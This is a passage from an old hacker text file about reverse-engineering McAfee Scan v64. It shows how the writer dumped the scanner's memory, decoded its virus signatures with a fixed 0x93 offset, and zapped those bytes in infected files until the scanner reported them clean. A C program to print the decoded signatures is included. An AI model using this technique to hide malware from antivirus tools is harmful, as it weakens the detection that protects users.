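           find_footprint_in(PROGRAM, sizeof PROGRAM, DEMO_FP, n, 4, 12));
    return 0;
}
```

    Restricting the match to the offsets where the footprint is expected
rejects the text file while still flagging the program; it does nothing for
the altered copy, which needs a different footprint or a different method.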
 
A possible solution:
--------------------
 
    One thing that I think is a good idea is when a program allows users
to add new footprint data to it (like Norton's virus package). For now
users don't need to buy new releases for detection of viruses they may not
get/be able to detect. Instead for the cost of a call to a support bbs (part
of the original software agreement?) the user can get new data as it becomes
available or when they find a new one on their system they can immediately
add the new footprint rather than wait for the next version to be released.
 
Method used to obtain footprints:
---------------------------------
 
    After finding the data I was looking for was encoded I thought, How can
I get the data I wanted for my tests?
 
    Disassembling was out, not for any MORAL reason but, for the time
involved. So I thought it must have to decode the data for its own use
and to save time it would do it all before the scan rather than slow the
process down by doing a full decode. So I needed to look at the memory
image of the running program. Thanks to DOS 5.0 and dosshell I was able to
do this.
 
    After spawning the scan task under the dos shell I used alt-tab to
swap back to the shell. Once back in the shell I used the shell commands to
copy the tmpxxx.swp to foo.img and terminate scan64 and dosshell.
 
    Then using a sector editor I searched through the temp file created by
the dos shell. I found an area of data that contained the virus names and
non ascii text data separating them. Even though the strings of ascii data
(virus names) ended with a zero character (as variable strings have a
tendency to), the random data did not end with a common signal character (as
expected for code can be any character). There was also no character count
stored (the data length varied so it could not be assumed by the scan
program as well). So I continued to search through the data.
 
    I eventually found another area that had the same text strings (virus
names). This time the first character of the non ascii data gave the count
of the data size to the following text string. I knew I had found it so I
extracted this data to another file (starting at 0 offset in the new file).
Then wrote down some codes and checked them against viruses I had.
 
    The codes I had did not seem to match. This did not stop me. I took one
virus (that my understanding said scan was only looking for 6 consecutive
bytes to match) and started zapping bytes (in a file scan said was infected)
to find what it was looking for. The process involved zapping one sector
at a time till scan said it was not infected, then half of that sector, then
half of a half, and so on. It came down to 6 CONSECUTIVE bytes as I expected.
But they were DIFFERENT from the ones I had.
 
    So I went to the windows calculator (it allows byte arithmetic in hex,
ie.. 0xff + 0x04 = 0x03 (rollover, carry is ignored), it would be outside
the scope of this ARTICLE to explain why I thought byte arithmetic was
important). Some quick subtraction found a 0x93 (decimal 147) DIFFERENCE
between the actual codes and the ones from the allocated memory used by
scan.
 
    So taking another virus that scan said was infected I did the minor
hex math on the codes in the allocated memory used by scan and found the
codes. Then I zapped only the codes and ran scan on the updated virus file.
It said there was no infection. I knew I now had the right codes (after a few
more checks).
 
    So I created a simple C program (see below) to convert the extract file I
created and converted the codes to a readable form (output from program
listed at end of ARTICLE). Then tested other viruses against the list. And
found the same results.
 
Binary to hex program:
----------------------
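/*
    fp2txt.c
        Convert footprint binary information to text.
            by GodNet Raider
 
    Notes:
        Please forgive the unrefined/unannotated nature of this code it was
        designed as a one shot.
*/
 
#include <stdio.h>
#include <stdlib.h>
 
#define MAGICNUM 0x93    /* difference between stored and actual bytes */
 
int main (void)
{
    unsigned char
        sVirusFP [256],      /* [0] = length byte, [1..] = decoded bytes */
        szVirusName [128];
    unsigned int
        nLen,
        nCnt;
    int
        nChar;
    FILE
        *Stream;
 
    Stream = fopen ("fp2.img", "rb");
    if (Stream == NULL)
        {
         perror ("fp2.img");
         return (EXIT_FAILURE);
        }
    /* each record: length byte, encoded bytes, zero terminated name and
       one more byte that is skipped; a zero length byte ends the list */
    while ((nChar = getc (Stream)) != EOF && nChar != 0)
        {
         *sVirusFP = (unsigned char) nChar;
         nLen = (unsigned int) nChar;
         /* undo the encoding; unsigned char arithmetic wraps modulo 256 */
         for (nCnt = 1; nCnt <= nLen && (nChar = getc (Stream)) != EOF; nCnt++)
             sVirusFP [nCnt] = (unsigned char) (nChar - MAGICNUM);
         if (nChar == EOF)
             break;                      /* file ended inside a record */
         /* read the name up to zero, end of file or a full buffer */
         nCnt = 0;
         while ((nChar = getc (Stream)) != EOF && nChar != 0)
             if (nCnt < sizeof (szVirusName) - 1)
                 szVirusName [nCnt++] = (unsigned char) nChar;
         szVirusName [nCnt] = '\0';
         printf ("\n%s:\n    ", (char *) szVirusName);
         /* print the decoded bytes, eight to a line */
         for (nCnt = 1; nCnt <= nLen; nCnt++)
             {
              printf ("0x%02x ", (unsigned int) sVirusFP [nCnt]);
              if (nCnt < nLen && !(nCnt % 8))
                 printf ("\n    ");
             }
         printf ("\n");
         getc (Stream);                  /* skip the byte after the name */
        }
    fclose (Stream);
    return (EXIT_SUCCESS);
}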
 
 
Footprints discovered:
----------------------
 
    The following is a list of the footprint codes found in McAfee asso.
Scan3.7v64.
 